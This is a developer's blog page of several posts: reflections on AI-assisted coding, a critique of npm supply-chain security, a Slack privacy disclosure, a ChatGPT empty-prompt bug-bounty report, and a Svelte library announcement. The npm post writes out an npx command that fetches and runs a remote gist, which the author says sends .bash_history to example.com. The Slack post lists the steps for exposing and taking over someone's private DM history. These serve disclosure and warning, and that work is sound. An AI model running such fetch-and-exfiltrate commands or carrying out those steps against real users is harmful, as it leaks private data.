The Man With No Brains

 Published: Feb 5, 2026~ 900 words~ 4 minutes reading time

I actually enjoy setting up a new coding project from scratch - those first couple of hours where you go from nothing to something, even if it’s just poorly laid out HTML and CSS, or a bunch of console.log statements.

Recently though, I’ve found myself unable to approach any new task without AI’s help.

Like an addiction, it became a trap. I couldn’t break free from the cycle of constant stimulation and instant gratification these tools provided. Instead of being a useful helper, AI became the process itself - I stopped starting with code and using AI to work through ideas, and instead started with AI and used it to generate the implementation.

How it started

When they first became available, AI coding agents felt novel and exciting - like a new tool in my toolbox that helped me realise ideas in completely new domains or languages, at a speed I wasn’t capable of before.

One example is Teskooano - my personal project to build a 3D space engine, something I’d wanted to do for years but never found time to realise. I discovered I could go from idea to working prototype in hours, achieving things that seemed beyond my reach. It became “just one more turn” - I’d see opportunities to add features, and instead of waiting for my slow meatbrain to implement them, they’d be done in minutes.

But now it’s a complex mess. Even today, I still haven’t actually learned how to write WebGL shaders or understood the inner workings of ThreeJS.

Yes, AI helped me build the project but it robbed me of the joy of learning, and the satisfaction of finally understanding how things work. In less than two years, I’ve become more dependent on AI than I could have imagined.

How it’s going

I now struggle to connect dots that previously weren’t a problem in my day-to-day work. No one forced me to do this - I have no top-down executive orders mandating AI use. This situation is wholly of my own making.

But companies have spoken. Many of us now work in environments where we’re constantly expected to deliver new features while being told there’s no budget to grow teams (in fact, we have to cut engineers). AI creates a mirage of productivity - it feels like it’s helping us ship solutions faster.

Software development used to feel like pottery to me. You take a piece of clay and start shaping it into something - its final form truly unknowable. From that initial spark, the clay takes shape through the connection between human mind and hands, imagination being manifested into physical reality to create something that didn’t exist before. Maybe not novel in the sense that it’s a cup, plate, or vase - but no two pieces are ever the same, because no two people, or pieces of clay, are the same. This is especially true for abstract ideas. We call this art.

In this new age of AI agents, it feels like we’re heading somewhere dark. That spark of creation from the human mind is being replaced with a wholly mechanical process - one where every ‘piece of clay’ is the same, and every AI agent produces the same mechanical movements, with no connection to that mental space where truly novel ideas are born.

Code has moved from art to assembly line, from unique to mass-produced commodity - perhaps ironic considering my employer , whose entire business model is based on volume production.

What can be done?

We now exist in a weird liminal space - where software development is both easier than it’s ever been, and yet somehow harder to actually do.

I don’t believe the solution is to abandon using AI entirely - for some of us that ship has already sailed, and from experience - there can be genuine value in these tools when used thoughtfully. Instead, I’m trying to recalibrate my relationship with them.

I’m learning to recognise the difference between productive use and dependency. I’ve decided that when I catch myself reaching for AI before I’ve even thought through the problem, I need to stop. Sometimes the slow, frustrating process of figuring things out yourself is exactly the point.

I’m going to force myself to write the first version of anything by hand - even if it’s messy, incomplete, or wrong. The AI can step in to help optimise, or explain concepts I don’t understand. But that initial act of creation, that struggle with the blank page, needs to stay human.

I’m also being more intentional about what I don’t offload. If I’m working in a domain I want to actually understand - like graphics programming - I want make myself read the documentation, follow tutorials, make mistakes - thats the way we as humans truly learn and grow.

The craft of software development has always been about problem-solving and learning. AI should amplify those things, not replace them. We need to remember that reality is messy and at times inefficient and that the process of learning isn’t something to be optimised - it’s the point.

Oh no, not again... a meditation on NPM supply chain attacks

 Published: Sep 9, 2025~ 1700 words~ 8 minutes reading time

I’ve been sitting on this article for a while now – well over a year I’ve put off publishing it – but as we’ve seen this week, the time has come to lift the veil and say the quiet part out loud:

It’s 2025; Microsoft should be considered a “bad actor” and a threat to all companies who develop software.

Of course, if you’re old enough to remember – this is not the first time either…

Time is a flat circle

Here we are again – in 2025, Microsoft have fucked up so bad, they have likely created an even larger risk than they did in the 2000’s with their browser by simply doing absolutly nothing.

I had started initially writing this post around the time of the xz incident – a sophisticated and long-term attempt to gain control of a library used in many package managers of most Linux distributions.

Since then, many more incidents have happened, and to be specific NPM has become the largest and easiest way to ship malware. At first, most of it was aimed at stealing cryptocurrency (because techbros seem to be obsessed with magic electic money and are easy prey). But now, these supply chain attacks are starting to target more critical things like tokens and access keys of the package maintainers, as seen with the NX incident and now several depedencies that are used daily by thousands of developers .

Again… this is nothing new in the land of NPM.

But it didn’t have to be this way…

We’ve come along way, but have travelled nowhere

I have a long history with NodeJS – around 2010 I started working on a startup, and this was before npm was even a thing .

A sceenshot of a slide with an announcement of npm as a package manage for node

Back in the misty days of the 1990s most JavaScript security issues were not much of a backend concern: this was mostly the domain of Perl, PHP, Python, and Java.

The web however was a much different story.

In the very early days of the World Wide Web there was really only one main browser everyone used: Netscape Navigator. Released in 1994 it was not just a browser: throughout its life it had various incarnations of a built-in email client, calendar, HTML editor with FTP browser, and with plugins could play media files like Realplayer and MP3 (which I remember at its launch) and Flash movies and games. It’s where JavaScript was born.

Many of the early websites of the day were static – popular tools to build websites included HotDog or Notepad . No fancy IDEs or frameworks, just a text editor, a browser, and alert() to debug.

Microsoft had also entered the game with Internet Explorer – included in an early Windows DLC called “Plus! For Windows 95”. It eventually became the software that Microsoft bet its whole company strategy around (much like today with AI).

Internet Explorer was embedded into every aspect of Windows – first in 1995 with Active Desktop, which continued all the way to Windows XP. With it you could embed a frame item on your Desktop, but also a Rich Text document or Excel spreadsheet. It was also bloated and buggy – and with that it presented two problems: a massive security risk and exposure to accusations of monopolising the browser market.

The law came after Microsoft hard and in 2001 it won – Microsoft was told to break up its monopoly. One aspect was that it had to offer other browsers on its operating system (a similar story happening now to Apple) – but it also wasn’t forced to remove Internet Explorer.

Microsoft essentially abandoned IE; as the years rolled on they continued to push out new major verions to capture the market, but without fixing the major flaws. It still shipped as default with the OS, unable to be removed without breaking other parts of the system.

Each release of Internet Explorer added something new to the browser landscape, but it also continued to add bugs and flaws on top of the ones that no one touched – by default, on all Windows systems lived code that could give hijackers access to users machines .

It wasn’t until 2015 they finally abandoned the existing Internet Explorer codebase and shifted to a new engine before eventually settling on their ChomeBlink-based engine. However the ghost of IE still haunts us today .

The ticking time-bomb of postinstall

8 years ago, I wrote a small proof of concept . It was in response to this issue about npx – a small tool that had just been added to npm by default whether you liked it or not.

With npx you could now run the following arbitary command (PLEASE DO NOT RUN THIS SCRIPT):

npx https://gist.github.com/tanepiper/6cb9067adca626cd2c0edbc3786dad7b

This would now pull the gist as a node module and run it. In the proof-of-concept I put this command as a postinstall script. If you look at the gist, it’s a small binary script that posts your .bash_history to example.com – which at the time npx would just run.

My frustration at the time was aimed mostly towards npx itself – it seemed like the NPM team were adding a new easy-to-use attack vector by shipping a tool that could run any module from any source on the web, on your machine without user interaction. But little did I know at the time there was a deeper problem lurking with postinstall.

At the time I also created a package.json linter that would warn of potential issues. But of course it required projects to opt in, it needed trust, and I didn’t see a way forward for it.

This was, of course, before Microsoft, via GitHub, owned NPM.

A short bit of history

So how did NPM become the main package manager for Node? Back then, it solved a problem – it was as simple as that – and people noticed it and adopted it. Over time, more useful little libraries showed up and from that, the rest is history.

NPM, built on CouchDB which enabled fast replication, allowed a flourishing and open JavaScript ecosystem. In the beginning, it was a bit of a wild west, where people tended to cut corners or miss steps. There was also a lot of early abandonment of libraries, and communities started to form around some of the larger ones to at least establish them as de facto tools – Express.js for example has been around since before npm (and for all the complaints about performance aimed at it: it’s highly battle tested and the worst bugs have likely been squashed).

Node and npm’s future was not a guaranteed thing. At some point, there was fragmentation of the ecosystem – tools such as yarn and pnpm exist because npm couldn’t or wouldn’t fix something, but they introduced their own changes that only made them partially compatible with each other. In 2014, for a short while we even had a fork of NodeJS called io-js because of fundamental disagreements.

There was also the small problem that all of this infrastructure and services cost money to run.

To paraphrase C J Silverio – “There’s no money in package managers.”

In 2018 Microsoft bought GitHub (and until this year ran it as a side-concern with its own CEO and management team – just last month, the CEO stepped down and now GitHub is part of the “AI” team). In 2020, GitHub bought NPM – with pockets deep enough to run the infrastructure. This means that Microsoft owns the world’s largest repository of JavaScript code, the distribution channel for its packages – and the development ecosystem with VSCode.

This likely saved npm in the long run by them simply having the resources to do so.

On the other hand, they have done little to make it a more secure tool, especially for enterprise customers. To their credit, GitHub has provided new tools for Software Bill of Materials Attestastion , which is a step in the right direction. But right now there are still no signed dependencies and nothing stopping people using AI agents, or just plain old scripts, from creating thousands of junk or namesquatting repositories.

… and as we’ve learned 2-Factor Authentication isn’t enough secure npm.


I want to get back to the fun of building software

Ultimately, I don’t think we can trust the software ecosystem provided by Microsoft anymore. It’s too fragile, brittle in the wrong places, and too open to abuse, and for most of my career I have seen the causes and effects first hand. This has made software development less fun, and more of a chore.

The tools we use to build software are not secure by default, and almost all of the time, the companies that provide them are not held to account for the security of their products.

Without a concerted effort across the industry to make the software supply chain secure by default, we will continue to see a rise in incidents – and the risks to data privacy and security will only increase. Criminal and state actors are always looking to exploit the vulnerabilities in our software; the use of AI to create more sophisticated attacks will only improve. These don’t have to be technical either – deep fakes are close enough to be used as effective social engineering tools - and it’s very easy to fake emails that seem very legitimte.

Unfortunately, Microsoft seem to be actively hostile - in their lack of attempts to shut down an active security hole that’s almost a decade old, they have left their customers are the higest levels of risk seen in computing.

For many companies, now is the right time to start looking at the tools they use to build software, and to start asking the hard questions about the security of their software supply chain – is it putting their customers, workers, or own profits at risk?

Slack wants you you know this privacy exploit is fine

 Published: Sep 25, 2023~ 900 words~ 4 minutes reading time

Last week, after a call with the engineers on my team I wanted to send a message to two of the engineers at the same time - little did I know I’d find what I believe to be a nasty privacy exploit in Slack - one that made me ask “Why is this even a feature?”

Like any good responsible software engineer, instead of taking to social media or forums to post about the exploit - I opted to report it to HackerOne - where Slack accepts reports of potential security exploits. After giving a detailed list of instructions on how to achive it (Report #2171907).

Shortly after (within 40 minutes) I recieved a reply which slightly dumbfounded me - the full reply is below, but began “We have reviewed your submission, and while this behavior is not perfectly ideal, it is intended.”

After asking some people in the Infosec community what is the right next step, I was advised that I’m within my rights to inform about this, mostly to give fair warning to Slack users that this exploit exists.

Unforeseen Consequences

So what was this exploit I found - in some way it’s so deliciously simple, that I had to double check it actually happened. I found it by using Slack “as intended” - but the result was not what was expected, with an unclear UI about the consequences - and I believe for most users who may experience it, would not realise what has happened. Certainly in the moment it could cause real harm to users, under certain circumstances.

The list of actions is as follows:

  1. Click on a user in Direct Messages
  2. Click on the user name at the top where the chevron is located
  3. Click "Add people to this coversation" (up to 9 people)
  4. Add one or more users to the conversation

You will now receive a popup with several options - in this case, because I couldn’t find the original DM with the pair of engineers in the UI it seemed like the option “Include conversation history?” seemed sensible.

In hindsight, it does have a message at the top of the screen - but in the moment as many know, these messages when not labeled as warnings can be missed or ignored by users - or any bad actor with access to the appropriate Slack account

So now a private DM conversation, going all the way back to the beginning of this history has now been shared with all the people added to it, attachments and all.

The person in the DM thread received no consent to allow this action.

But what now makes it worse is that this whole DM is now a thread, and a thread can be turned into a private channel.

Once turned into a private channel, the original person in the DM can be removed from the entire room - no longer having access to any of the messages. Also as a channel a much larger number of people (like a whole organisation) can be added to it.

OK, what now?

So the functionality is working as intended.

But what if I’m a disgruntled employee who has some DMs with a board member who was sharing internal confidential information? Or a bully who happens to find an unlocked computer of a fellow employee they know is in a secret relationship? Or a hacker who has managed to get into a key account of a Slack that hasn’t enabled 2FA, or via a magic link in their email account because of a weak password?

Its not like unauthorised access to systems is not a thing

Slack’s reply and caveats

To be fair to Slack, I will include the response below where they include their reasons why this is “as intended”.

I’ll leave it up to you the reader to decide if it’s enough of a mitigation, or if many companies would even have the processes to begin to deal with this an an immediate threat - I can guess many companies using it don’t even have a dedicated CSO, team managing slack - and likely use default settings.

Thank you for your report.

We have reviewed your submission, and while this behavior is not perfectly ideal, it is intended. In this “attack”, a user must have the permission to create private Channels, and this can be restricted by Owners/Admins.

In addition, the DM messages are not truly deleted when performing this behavior. An Admin/Owner with the necessary permissions to manage private Channels can always access the content within private Channels if necessary.

For these reasons, we are relatively satisfied with our security at this time, and we will be closing this report as Informative. Regardless, we appreciate your efforts here, and hope you continue to submit to our program.

Thanks, and good luck with your future bug hunting.

I Think I Found a Privacy Exploit in ChatGPT

 Published: Apr 14, 2023~ 1200 words~ 6 minutes reading time

> tl;dr: I discovered that passing empty prompts to ChatGPT still generates responses Initially, I thought these might be hallucinations, but now I suspect they could also include other users' responses from the API

Last month, OpenAI unveiled their advanced large language model, ChatGPT-4 , attracting attention from developers, enterprises, media, and governments alike.

Before receiving my GPT-4 invite, I experimented with alpaca.cpp , designed to run models on CPU’s with limited memory constraints. I began by developing a simple web interface using NodeJS and sockets for parsing the command line. Once I started working with the GPT-4 API, I quickly realized that with the right prompts, it could be a powerful tool. It has already helped me rewrite complex code into simpler methods and reduce complexity by moving code to functions:

Screenshot of ChatGPT suggesting a code improvement for creating tables by proposing a cell creation method

However, I noticed something peculiar — due to a bug in my code, I was sending empty prompts to the ChatGPT endpoint, but I still received seemingly random responses ranging from standard AI model introductions to information about people, places, and concepts. Inspired by the coinciding #StochasticParrotsDay online conference, I transformed this into a Mastodon Bot (now moved to botsin.space ).

After running the bot for a month, I concluded that a significant portion of the responses without prompts might be responses for other users, potentially due to a bug that sends unintended responses when given an unsanitized empty prompt.

These could be stochastic hallucinations, random training data pulled out by Entropy , or a mix of all three possibilities.

If this is the case, then ChatGPT would not be much better than a Markov Chain , and the entire large language model/AI market has been playing us for fools.

However if I am correct then the current OpenAI APIs could be made to potentially leak private or sensitive data, by simply not sanatising their inputs…

The bot will continue to run until at least the end of this month, and all the content will be archive at stochasticparrot.lol .

Summary of what it could be?

I have three pet theories around what’s happening here. I’ve submitted this to OpenAI’s Disclosue and BugBounty

  • These are impressive hallucinations, possibly sparks of AGI, but sometimes they become nonsensical and or the output is concerning, especially around personal medical questions.
  • ChatGPT randomly accesses its corpus and regurgitates data in some form. It really loves generating lists.
  • There is a bug, potentially a serious one. If the empty prompt issue is more thoroughly investigated, it might confirm that passing no prompt returns cached or previous responses.

It would be interesting if all three theories were true…

Update: Bug Bounty Reponse

I’ve since had a reply on Bugcrowd it was first closed it as Not Applicable with a response about the model, I re-itterated it was about the API. A futher response now confirms (from their perspective) that this is indeed hallucinations

Hi tanepiper,

Thank you for your submission to the OpenAI program and your patience on this submission. We appreciate your efforts in keeping our platform secure.

It looks like what you’re experiencing here is what happens when you send a request to the model without any query at all. You can try it out yourself in the API like this:

curl 'https://api.openai.com/v1/chat/completions' \
  -H 'authorization: Bearer <yourtoken>' \
  -H 'content-type: application/json' \
  --data-raw '{"messages":[{"role":"system","content":""}],"temperature":0.7,"max_tokens":256,"top_p":1,"frequency_penalty":0,"presence_penalty":0,"model":"gpt-3.5-turbo","stream":true}' 

What’s happening there is that it’s starting by picking a token completely at random, and then another one, and so on until the previous tokens start to influence what comes afterward and it starts to “make sense”, even if it’s just a completely random hallucination from the model. It’s a really fascinating and weird way these models work. However, there’s no security impact here. As such, I do believe the current state of the submission is accurate.

All the best in your future bug hunting!

Best regards, - wilson_bugcrowd

So for now, case closed…


Setting up the Bot Infrastucture

To get the bot up and running, I wanted to do it for free, and easy to manage. In the end I opted to use GitHub Actions with scheduled tasks to create it - this allowed me to set up a script that ran hourly - calling the ChatGPT API with an empty prompt, and turning it into a toot. I also found that passing only a space character to the Dall-E API also produced images.

With both scripts, after getting a response from OpenAI, I use it to generate one or more toots - depending on the length as a set of replies, with the images first download them and then upload them as attachments first.

Some of the more recent toots are below - ones with a parrot emjoi (🦜) are created without a prompt, while if a prompt is used I add a speech bubble (💬) to indicate

Once I had this up and running, I then created a small AstroJS website that outputs each entry as a posting.

Making Polly Speak

Up to this point, I had just been working with text and images - but I had recently seen ElevenLabs in some tech news, and that they had a text-to-speech API. After some initial issues (which used up all of the free credit) - I eventually set up another action that took the OpenAI response, and passed it to the ElevenLabs API - this then provided a MP3 stream of the speech, saved locally and again upload to Mastodon and attach to a toot.

I also decided to try see if I could get it to generate some polls. With some gentle prompting I was able to get it to generate JSON output which could be used in polls. Sadly, most of the time it seems to repeat the same questions over and over with just slightly different wording, occasionally coming up with something original

I even went as far as trying to generate video content - not through Stable Diffusion, but by generating text themes to use with the Createomate API - allowing me to generate social media “fact” videos. Unfortunatly this was a bit buggy, and due to the way Mastodon works can time out quite a bit.

A fun experiment

Overall, writing this bot was a fun experiment - but I probably learned more about writing better pipelines, than I did about AI and LLMs. What did surprise me was how often the responses seem to be to questions that were not asked - where are these responses being generated? Are we seeing the flicker of AGI? Or just the stochastic ramblings of a machine run by some sketchy people .

Announcing Formula - A Zero-Config Reactive Forms Library for Svelte

 Published: Feb 13, 2021~ 300 words~ 2 minutes reading time

Today I’m happy to announce the release of Svelte Formula - a new forms library for Svelte .

The Svelte Formula Logo is some science beakers and a molecule

Formula is a Zero-Config library - what this means is that you do not have to pass any settings to the library itself to handle form validation and submission - it uses the validation properties of HTML5 forms directly, meaning you can create progressive, accessible forms first.

The library is for use with the use directive and can be bound to any element, not just <form> ones and the library automatically handles subscription and unsubscription to any form element with a name attribute.

Here is the example from the demo:


<script>
  import {onDestroy} from 'svelte';
  import {formula} from '[email protected]'

  const {form, formValues, validity, touched, formValid} = formula();

  const sub = formValues.subscribe(v => console.log(v));

  onDestroy(() => {
    sub();
  })
</script>

<form use:form>
  <div class='form-field'>
    <label for='username'>Username</label>
    <input type='text' id='username' name='username' required minlength="8" class:error={$touched?.username &&
           $validity?.username?.invalid}/>
    <div hidden={$validity?.username?.valid}>{$validity?.username?.message}</div>
  </div>
  <div class='form-field'>
    <label for='password'>Password</label>
    <input type='password' id='password' name='password' required minlength="8" class:error={$touched?.password &&
           $validity?.username?.invalid}/>
    <div hidden={$validity?.password?.valid}>{$validity?.password?.message}</div>
  </div>

  <button disabled={!$formValid}>Save</button>
</form>

<style>
  .form-field {
    margin-bottom: 10px;
    border-bottom: 1px solid lightgrey;
  }

  .error {
    border: 1px solid red;
  }
</style>

In this example the only validations are required and minlength applied directly to the HTML element itself - displaying errors and error states are via the validity object and the touched object allows us to only apply it when the form element is first focused on.

The release is considered an alpha version - the API may change and there are still tests and documentation to right - but you can try it our right now in your own project with npm install svelte-formula - any bugs, issues or suggestions please feel free to leave them here